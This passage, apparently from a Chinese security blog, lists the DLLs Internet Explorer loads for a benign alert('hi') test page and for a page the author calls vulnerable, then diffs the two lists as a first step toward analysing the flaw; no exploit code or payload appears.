msi.dll Windows Installer Microsoft Corporation C:\Windows\SysWOW64\msi.dll
msimtf.dll Active IMM Server DLL Microsoft Corporation C:\Windows\SysWOW64\msimtf.dll
msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\Windows\SysWOW64\msIso.dll
msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\msvcp_win.dll
msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\Windows\SysWOW64\msvcrt.dll
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\Windows\SysWOW64\mswsock.dll
netapi32.dll Net Win32 API DLL Microsoft Corporation C:\Windows\SysWOW64\netapi32.dll
netmsg.dll 网络消息 DLL Microsoft Corporation C:\Windows\SysWOW64\netmsg.dll
netmsg.dll.mui 网络消息 DLL Microsoft Corporation C:\Windows\System32\zh-CN\netmsg.dll.mui
netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\Windows\SysWOW64\netutils.dll
ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\Windows\SysWOW64\ninput.dll
nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\Windows\SysWOW64\nsi.dll
ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\SysWOW64\ntdll.dll
ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\System32\ntdll.dll
ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\Windows\SysWOW64\ntmarta.dll
ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\Windows\SysWOW64\ole32.dll
oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\Windows\SysWOW64\oleaut32.dll
OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\Windows\SysWOW64\powrprof.dll
profapi.dll User Profile Basic API Microsoft Corporation C:\Windows\SysWOW64\profapi.dll
propsys.dll Microsoft 属性系统 Microsoft Corporation C:\Windows\SysWOW64\propsys.dll
propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\Windows\System32\zh-CN\propsys.dll.mui
R000000000006.clb C:\Windows\Registration\R000000000006.clb
rmclient.dll Resource Manager Client Microsoft Corporation C:\Windows\SysWOW64\rmclient.dll
rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\Windows\SysWOW64\rpcrt4.dll
scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\Windows\SysWOW64\scrrun.dll
scrrun.dll Microsoft ® Script Runtime Microsoft Corporation C:\Windows\SysWOW64\scrrun.dll
sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\Windows\SysWOW64\sechost.dll
secur32.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\secur32.dll
SHCore.dll SHCORE Microsoft Corporation C:\Windows\SysWOW64\SHCore.dll
shell32.dll Windows Shell Common Dll Microsoft Corporation C:\Windows\SysWOW64\shell32.dll
shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\Windows\SysWOW64\shlwapi.dll
SortDefault.nls C:\Windows\Globalization\Sorting\SortDefault.nls
srpapi.dll SRP APIs Dll Microsoft Corporation C:\Windows\SysWOW64\srpapi.dll
sspicli.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\sspicli.dll
StaticCache.dat C:\Windows\Fonts\StaticCache.dat
SuggestedSites.dat C:\Users\bonelee\AppData\Local\Microsoft\Windows\INetCache\Low\SuggestedSites.dat
sxs.dll Fusion 2.5 Microsoft Corporation C:\Windows\SysWOW64\sxs.dll
TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\Windows\SysWOW64\TextInputFramework.dll
tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\Windows\SysWOW64\tokenbinding.dll
twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\Windows\SysWOW64\twinapi.appcore.dll
ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\ucrtbase.dll
urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\SysWOW64\urlmon.dll
urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\System32\zh-CN\urlmon.dll.mui
user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\Windows\SysWOW64\user32.dll
uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\Windows\SysWOW64\uxtheme.dll
vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\Windows\SysWOW64\vaultcli.dll
version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\Windows\SysWOW64\version.dll
vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\Windows\SysWOW64\vm3dum_10.dll
vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\Windows\SysWOW64\vm3dum_loader.dll
win32u.dll Win32u Microsoft Corporation C:\Windows\SysWOW64\win32u.dll
windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\Windows\SysWOW64\windows.storage.dll
winhttp.dll Windows HTTP Services Microsoft Corporation C:\Windows\SysWOW64\winhttp.dll
wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\Windows\SysWOW64\wininet.dll
winmm.dll MCI API DLL Microsoft Corporation C:\Windows\SysWOW64\winmm.dll
winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\Windows\SysWOW64\winmmbase.dll
winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\Windows\SysWOW64\winnsi.dll
wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\Windows\SysWOW64\wintrust.dll
WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\Windows\SysWOW64\WinTypes.dll
wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\Windows\SysWOW64\wkscli.dll
wldp.dll Windows Lockdown Policy Microsoft Corporation C:\Windows\SysWOW64\wldp.dll
wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\Windows\System32\wow64.dll
wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\Windows\System32\wow64cpu.dll
wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\Windows\System32\wow64win.dll
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\Windows\SysWOW64\ws2_32.dll
太多了,不知道问题在哪里!我单独创建一个正常的html文件,然后使用ie加载,文件内容如下:
<html>
start!
<script>
alert("hi");
</script>
</html>
运行后,
加载的dll如下:
Process: iexplore.exe Pid: 4808
Name Description Company Name Path
{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db
{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db C:\Users\bonelee\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db
{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db
~FontCache-FontFace.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontFace.dat
~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-2730912745-1723166478-227975165-1000.dat
~FontCache-System.dat C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-System.dat
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\Windows\SysWOW64\advapi32.dll
apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\Windows\SysWOW64\apphelp.dll
bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\Windows\SysWOW64\bcrypt.dll
bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\Windows\SysWOW64\bcryptprimitives.dll
C_1252.NLS C:\Windows\System32\C_1252.NLS
cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\Windows\SysWOW64\cfgmgr32.dll
clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\Windows\SysWOW64\clbcatq.dll
combase.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\combase.dll
comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll
comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll
comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\Windows\SysWOW64\comdlg32.dll
CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\Windows\SysWOW64\CoreMessaging.dll
CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\Windows\SysWOW64\CoreUIComponents.dll
crypt32.dll Crypto API32 Microsoft Corporation C:\Windows\SysWOW64\crypt32.dll
cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\Windows\SysWOW64\cryptbase.dll
cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\Windows\SysWOW64\cryptsp.dll
cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
d2d1.dll Microsoft D2D Library Microsoft Corporation C:\Windows\SysWOW64\d2d1.dll
d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\Windows\SysWOW64\d3d11.dll
DataExchange.dll Data exchange Microsoft Corporation C:\Windows\SysWOW64\DataExchange.dll
dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\Windows\SysWOW64\dcomp.dll
directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\Windows\SysWOW64\directmanipulation.dll
dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\Windows\SysWOW64\dwmapi.dll
DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\Windows\SysWOW64\DWrite.dll
dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\Windows\SysWOW64\dxgi.dll
efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\Windows\SysWOW64\efswrt.dll
gdi32.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32.dll
gdi32full.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32full.dll
ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\Windows\SysWOW64\ieapfltr.dll
ieframe.dll Internet 浏览器 Microsoft Corporation C:\Windows\SysWOW64\ieframe.dll
ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\Windows\System32\zh-CN\ieframe.dll.mui
ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\Windows\SysWOW64\ieproxy.dll
iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\Windows\SysWOW64\iertutil.dll
IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\Program Files (x86)\Internet Explorer\IEShims.dll
ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\Windows\SysWOW64\ieui.dll
iexplore.exe Internet Explorer Microsoft Corporation C:\Program Files (x86)\Internet Explorer\iexplore.exe
iexplore.exe.mui Internet Explorer Microsoft Corporation C:\Program Files\internet explorer\zh-CN\iexplore.exe.mui
imageres.dll Windows Image Resource Microsoft Corporation C:\Windows\SysWOW64\imageres.dll
imageres.dll.mui Windows Image Resource Microsoft Corporation C:\Windows\System32\en-US\imageres.dll.mui
imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\Windows\SysWOW64\imm32.dll
IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\Windows\SysWOW64\IPHLPAPI.DLL
jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\Windows\SysWOW64\jscript9.dll
kernel.appcore.dll AppModel API Host Microsoft Corporation C:\Windows\SysWOW64\kernel.appcore.dll
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\kernel32.dll
KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\KernelBase.dll
locale.nls C:\Windows\System32\locale.nls
mlang.dll Multi Language Support DLL Microsoft Corporation C:\Windows\SysWOW64\mlang.dll
mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\Windows\System32\zh-CN\mlang.dll.mui
mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\Windows\SysWOW64\mpr.dll
msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\Windows\SysWOW64\msasn1.dll
msctf.dll MSCTF Server DLL Microsoft Corporation C:\Windows\SysWOW64\msctf.dll
mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\SysWOW64\mshtml.dll
mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\System32\zh-CN\mshtml.dll.mui
msimtf.dll Active IMM Server DLL Microsoft Corporation C:\Windows\SysWOW64\msimtf.dll
msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\Windows\SysWOW64\msIso.dll
msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\msvcp_win.dll
msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\Windows\SysWOW64\msvcrt.dll
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\Windows\SysWOW64\mswsock.dll
netapi32.dll Net Win32 API DLL Microsoft Corporation C:\Windows\SysWOW64\netapi32.dll
netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\Windows\SysWOW64\netutils.dll
ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation C:\Windows\SysWOW64\ninput.dll
nsi.dll NSI User-mode interface DLL Microsoft Corporation C:\Windows\SysWOW64\nsi.dll
ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\SysWOW64\ntdll.dll
ntdll.dll NT 层 DLL Microsoft Corporation C:\Windows\System32\ntdll.dll
ntmarta.dll Windows NT MARTA provider Microsoft Corporation C:\Windows\SysWOW64\ntmarta.dll
ole32.dll Microsoft OLE for Windows Microsoft Corporation C:\Windows\SysWOW64\ole32.dll
oleaut32.dll OLEAUT32.DLL Microsoft Corporation C:\Windows\SysWOW64\oleaut32.dll
OnDemandConnRouteHelper.dll On Demand Connctiond Route Helper Microsoft Corporation C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
OneCoreCommonProxyStub.dll OneCore Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
OneCoreUAPCommonProxyStub.dll OneCoreUAP Common Proxy Stub Microsoft Corporation C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
powrprof.dll Power Profile Helper DLL Microsoft Corporation C:\Windows\SysWOW64\powrprof.dll
profapi.dll User Profile Basic API Microsoft Corporation C:\Windows\SysWOW64\profapi.dll
propsys.dll Microsoft 属性系统 Microsoft Corporation C:\Windows\SysWOW64\propsys.dll
propsys.dll.mui Microsoft 属性系统 Microsoft Corporation C:\Windows\System32\zh-CN\propsys.dll.mui
R000000000006.clb C:\Windows\Registration\R000000000006.clb
rmclient.dll Resource Manager Client Microsoft Corporation C:\Windows\SysWOW64\rmclient.dll
rpcrt4.dll 远程过程调用运行时 Microsoft Corporation C:\Windows\SysWOW64\rpcrt4.dll
sechost.dll Host for SCM/SDDL/LSA Lookup APIs Microsoft Corporation C:\Windows\SysWOW64\sechost.dll
secur32.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\secur32.dll
SHCore.dll SHCORE Microsoft Corporation C:\Windows\SysWOW64\SHCore.dll
shell32.dll Windows Shell Common Dll Microsoft Corporation C:\Windows\SysWOW64\shell32.dll
shlwapi.dll 外壳简易实用工具库 Microsoft Corporation C:\Windows\SysWOW64\shlwapi.dll
simsun.ttc C:\Windows\Fonts\simsun.ttc
SortDefault.nls C:\Windows\Globalization\Sorting\SortDefault.nls
srpapi.dll SRP APIs Dll Microsoft Corporation C:\Windows\SysWOW64\srpapi.dll
sspicli.dll Security Support Provider Interface Microsoft Corporation C:\Windows\SysWOW64\sspicli.dll
StaticCache.dat C:\Windows\Fonts\StaticCache.dat
SuggestedSites.dat C:\Users\bonelee\AppData\Local\Microsoft\Windows\INetCache\Low\SuggestedSites.dat
TextInputFramework.dll "TextInputFramework.DYNLINK" Microsoft Corporation C:\Windows\SysWOW64\TextInputFramework.dll
tokenbinding.dll Token Binding Protocol Microsoft Corporation C:\Windows\SysWOW64\tokenbinding.dll
twinapi.appcore.dll twinapi.appcore Microsoft Corporation C:\Windows\SysWOW64\twinapi.appcore.dll
ucrtbase.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\ucrtbase.dll
urlmon.dll Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\SysWOW64\urlmon.dll
urlmon.dll.mui Win32 的 OLE32 扩展 Microsoft Corporation C:\Windows\System32\zh-CN\urlmon.dll.mui
user32.dll 多用户 Windows 用户 API 客户端 DLL Microsoft Corporation C:\Windows\SysWOW64\user32.dll
uxtheme.dll Microsoft UxTheme Library Microsoft Corporation C:\Windows\SysWOW64\uxtheme.dll
vaultcli.dll Credential Vault Client Library Microsoft Corporation C:\Windows\SysWOW64\vaultcli.dll
version.dll Version Checking and File Installation Libraries Microsoft Corporation C:\Windows\SysWOW64\version.dll
vm3dum_10.dll VMware SVGA 3D D3D10 Client Driver VMware, Inc. C:\Windows\SysWOW64\vm3dum_10.dll
vm3dum_loader.dll VMware SVGA 3D Usermode Driver Loader VMware, Inc. C:\Windows\SysWOW64\vm3dum_loader.dll
win32u.dll Win32u Microsoft Corporation C:\Windows\SysWOW64\win32u.dll
windows.storage.dll Microsoft WinRT Storage API Microsoft Corporation C:\Windows\SysWOW64\windows.storage.dll
winhttp.dll Windows HTTP Services Microsoft Corporation C:\Windows\SysWOW64\winhttp.dll
wininet.dll Internet Extensions for Win32 Microsoft Corporation C:\Windows\SysWOW64\wininet.dll
winmm.dll MCI API DLL Microsoft Corporation C:\Windows\SysWOW64\winmm.dll
winmmbase.dll Base Multimedia Extension API DLL Microsoft Corporation C:\Windows\SysWOW64\winmmbase.dll
winnsi.dll Network Store Information RPC interface Microsoft Corporation C:\Windows\SysWOW64\winnsi.dll
wintrust.dll Microsoft Trust Verification APIs Microsoft Corporation C:\Windows\SysWOW64\wintrust.dll
WinTypes.dll Windows Base Types DLL Microsoft Corporation C:\Windows\SysWOW64\WinTypes.dll
wkscli.dll Workstation Service Client DLL Microsoft Corporation C:\Windows\SysWOW64\wkscli.dll
wldp.dll Windows Lockdown Policy Microsoft Corporation C:\Windows\SysWOW64\wldp.dll
wow64.dll Win32 Emulation on NT64 Microsoft Corporation C:\Windows\System32\wow64.dll
wow64cpu.dll AMD64 Wow64 CPU Microsoft Corporation C:\Windows\System32\wow64cpu.dll
wow64win.dll Wow64 Console and Win32 API Logging Microsoft Corporation C:\Windows\System32\wow64win.dll
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation C:\Windows\SysWOW64\ws2_32.dll
我们使用diff工具比较下差异:左边是hello world正常网页,右边是有上述漏洞页面的dll清单
好了,看到核心的几个dll加载了!
明天分析下加载这几个dll的原因。